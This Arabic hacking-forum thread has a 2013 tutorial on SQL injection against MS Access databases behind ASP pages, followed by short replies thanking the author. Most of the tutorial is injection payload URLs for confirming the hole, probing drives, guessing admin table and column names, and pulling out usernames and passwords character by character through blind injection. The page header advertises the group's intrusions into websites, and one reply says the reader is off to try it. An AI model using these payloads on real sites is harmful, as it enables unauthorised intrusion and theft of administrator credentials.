1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Murtadha Albejawe, بتاريخ ‏16 يناير 2013.

كاتب الموضوع : Murtadha Albejawe المشاهدات : 3,308 الردود : 10 ‏16 يناير 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Murtadha Albejawe
    rankrank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    :{7}: السلام عليكم ورحمة الله وبركاته :{7}:

    اليوم راح نشرح بإذن الله حقن الـ MS ACCESS

    انا لست خبير في هذا النوع من حقن
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    البيانات ولكن سوف افيدكم ببعض الطرق من خلال تجاربي
    :{21}:

    نبدا ..

    الموقع المصاب :


    http://site.com/index.asp?id=1




    طبعا نضيف ( ' ) للتاكد من انه مصاب ..

    [​IMG]

    نتاكد من انها ليست وهمية او خطأ ..


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    1 and 1=1
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    1 and 1>1
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    1 and 1=2




    تمام شغاله .. خلينا نبلش بالحقن i:q4^:


    http://site.com/index.asp?id=1 union select 1 from random.randomtable




    سيساعدنا هذا الامر لمعرفة مسار تنصيب
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    الـ ACCESS

    [​IMG]

    الآن يمكننا أن نبدأ عن طريق فحص وجود أي مسارات محرك أقراص آخر ..





    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    and 0=(select count(*) from N:\.a)




    قم بتغيير " N " الى أي حرف تريد ان تبحث عنه ( رمز البارتشن )

    ويستحسن قرائة الـ errors بدقة وتركيز لكي تصل الى مبتغاك

    لان الاخطاء هي تساعدك في اشياء كثير

    راح اشرحلكم نبذه بسيطه وسريعه عن قرائة الاخطاء وتفسيرها والاستفادة منها

    اذا جانا خطأ يقول " not a valid path "

    معناها انه غير موجود

    [​IMG]

    واذا جانا خطأ بهالشكل " can’t find file "

    هذا معناه إن البارتشن ( الدرايف ) موجود وعلى هيئة data drive

    وأما اذا جا بهالشكل " disk or network error "

    معناه أن البارتشن هذا لمساحة تخزينية أو سيدي او إي شيء من هالنوع ..

    ف عليك ان تجرب وتخمن ، والخيارات المٌمكنة تتكون من : A-Z

    كما MS-ACCESS لا يوجد بيها information schema ،، أذا عليك ان تقوم بالتخمين في حالة اصدار القاعدة = 4

    MySQL => 4

    ألـ syntax structure تكون مشابهه للأتي :


    كود:
    http://site.com/index.asp?id=[COLOR=#8b0000]1 and 0<=(select count(*) from [N]) and 1=1[/COLOR]

    ملآحظة : تقوم بتغيير حرف " N " الى اسم الجدول الي عملت فحص عليه

    اذا طلعلك true فـ معناها إن الجدول موجود والان نذهب للمرحلة البعدها ..

    أذا كان بامكانك اتمام هذا الجزء وفهمه جيدا فـ أنا اقترح عليكم تجربة أداة SQLMAP

    كـ أفضل اداة في هالمجال ..

    طيب خلونا نكمل ،

    نحاول الان حقن الموقع ونحاول نخمن جدول الادمن :


    كود:
    http://site.com/index.asp?id=[COLOR=#8b0000]1 and 0<=(select count(*) from [admin]) and 1=1[/COLOR]

    طيب طلع معاي هالناتج

    FALSE: can’t find input table or query "admin"s

    طيب نجرب نغير جدول الادمن ..


    كود:
    http://site.com/index.asp?id=[COLOR=#8b0000]1 and 0<=(select count(*) from [tbllogin]) and 1=1[/COLOR]

    تمااااااام

    TRUE: Page refreshes like normal, indicating table exists in the database
    (which is actually a file in Access’ case: filedb.mdb)
    TABLE: tbllogin

    اذا هنا حصلنا على جدول الادمن .. نحاول وبنفس الطريقه الحصول على الاعمدة

    وذلك عن طريق التلاعب في اوامر الحقن نخليها هكذا ..


    كود:
    http://site.com/index.asp?id=1 [COLOR=#8b0000]and 0<=(select count([N]) from [TableName]) and 1=1[/COLOR]

    عليك الان بتغيير TableName الى الاسم العمود فوق اسم الجدول tbllogin

    وأيضا غيير N الى الاعمدة الموجوده

    وسوف يقوم الموقع بالعمل على نفس الجداول الموجوده في اوامر الحقن

    واذا كان الاستغلال صحيح والاسماء مضبوطة ف سوف يقوم بعمل ريفرش للموقع ويٌستعرض مع عدم وجود اخطاء

    مجرد قم بالتخمين مضبوط

    في هذا المثال انا وجدت االاعمدة : id, username, password

    [​IMG]

    تماام الان نرجع قليلا الى الخلف مقارنة بالاساليب والطرق الاخرى ..

    كما هو الحال الآن نحن بحاجة لتحديد عدد الأعمدة للجدول وبعد ذلك يمكننا استخراجه

    إذا لم نتمكن من تحديد الاعمدة سوف نلتجيء الى اساليب اخرى وطرق الحقن الاعمى (blind injection)

    لتحديد عدد الأعمدة لجدول مٌعين يمكنك أن تجرب هالآمر ..

    سوف نستخدم الـ NULL Byte في الحقن بدلا من الارقام لمنع ظهور الاخطاء في الاستغلال



    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    union all select null from [TableName]
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    union all select null,null from [TableName]




    %2bchr(72)%2bchr(82) = +H+R

    تبقا بوضع هذه في جميع عدد الاعمدة حتى يظهر لنا العمود المصاب

    اذا ظهر لنا رقم عمود نستطيع استخدامه في استخراج بيانات تنفعنا

    وفي حالة ماتنجح معنا نظطر لـ استخدام الحقن الاعمى لاستخراج هذه البيانات

    من خلال تجربتي هذه هي الطريقة المستخدمة في معظم الوقت

    راح نحاول نطلع عدد الصفوف ( rows )

    بمجرد اختبارنا للقيمة العددية النتائج تفسر :


    كود:
    http://site.com/index.asp?id=1 [COLOR=#8b0000]and Len((select Count(*) from [TableName]))=<num>[/COLOR]

    طبعا هالامر يفيدنا في معرفة عدد الارقام الموجوده في TableName


    [​IMG]

    نستخدم هالامر ايضا لمعرفة طوله


    كود:
    http://site.com/index.asp?id=1 [COLOR=#8b0000]and asc(mid((Select Count(*) from [TableName]),1,1)=<num>[/COLOR]

    كود:
    http://site.com/index.asp?id=1  [COLOR=#8b0000]and Len((select top 1 [ColumnName] from (select top 1 * from (select  top 1 * from [TableName] order by 1) t order by 1  desc)t))=<num>[/COLOR]

    TRUE

    [​IMG]

    FALSE

    [​IMG]

    نسحب كل الاحرف ونحولها لقيمة CHAR لنقراها بوضوح

    وراح تستخدم "<",">" & "=" في معرفة ما اذا كان الناتج TRUE ولا FALSE

    ونستخدم هالامر


    كود:
    http://site.com/index.asp?id=1  [COLOR=#8b0000]and asc(mid((select top 1 [ColumnName] from (select top 1 * from  (select top 1 * from [TableName] order by 1) t order by 1  desc)t),N,1))=<char>[/COLOR]
    وهذا كل ما اعرفه عن هذا النوع من حقن القواعد :!."​

    يعني احتمال تلاقو اخطاء واحتمال اكون ناسي اشياء مع العلم اني استعانيت بكتب ومراجع كثير وجمعت ايضا بعض الاوامر من مدونات رائعه وحاولت افيدكم بالي اعرفه
    &:"

    وانت تابعو التحديثات الجديده لغرض الاستفاده بالخبره مو اكثر
    )A:"

    تحياتي للجميع.
    &:":



     


    جاري تحميل الصفحة...
  2. غير متصل

    !Hackon!
    rankrank
    Developer

    عضو منذ:
    ‏14 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    Hacking
    الإقامة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    وعليكم السلام


    وربي موضوع ابداع


    :{4}:​
     


  3. غير متصل

    saico
    rank
    DeveloPer Plus

    عضو منذ:
    ‏21 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    تسلم يا غالى

    جـــــــاري التطبيقi:q2^: ​
     


  4. غير متصل

    LiON H34RT
    rank
    Developer

    عضو منذ:
    ‏30 سبتمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    S3curity & Hack
    الإقامة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    يعطيك العافية اخي الكريم ..
    ابدعت فاتقنت العمل ..
    الف تحية لك يالغالي ..​
     


  5. غير متصل

    αЗѕαя
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    بارك الله فيك اخي الحبيب فعلا موضوع جبار بامتياز




    الله يعينك في حياتك العملية و الشخصية يارب &:":​
     


  6. غير متصل

    Dr.aL-jArH
    DeveloPer Plus

    عضو منذ:
    ‏24 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    بارك الله فيك

    )5:"
     


  7. غير متصل

    هكر تعبان
    rank
    Developer

    عضو منذ:
    ‏18 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    الله يوفقك أخوي

    موضوع روعه ​
     


  8. غير متصل

    مجنون الاختراقات
    rank
    Developer

    عضو منذ:
    ‏15 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    يع ـطيك الف عافيهَِ , $:"​
     


  9. غير متصل

    خيال الروحـ
    rank
    Developer

    عضو منذ:
    ‏24 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    تسلم ايدك ​
     


  10. غير متصل

    الشبح الدموي
    rank
    Developer

    عضو منذ:
    ‏26 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    جزاك الله خيرآ

    &:":
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...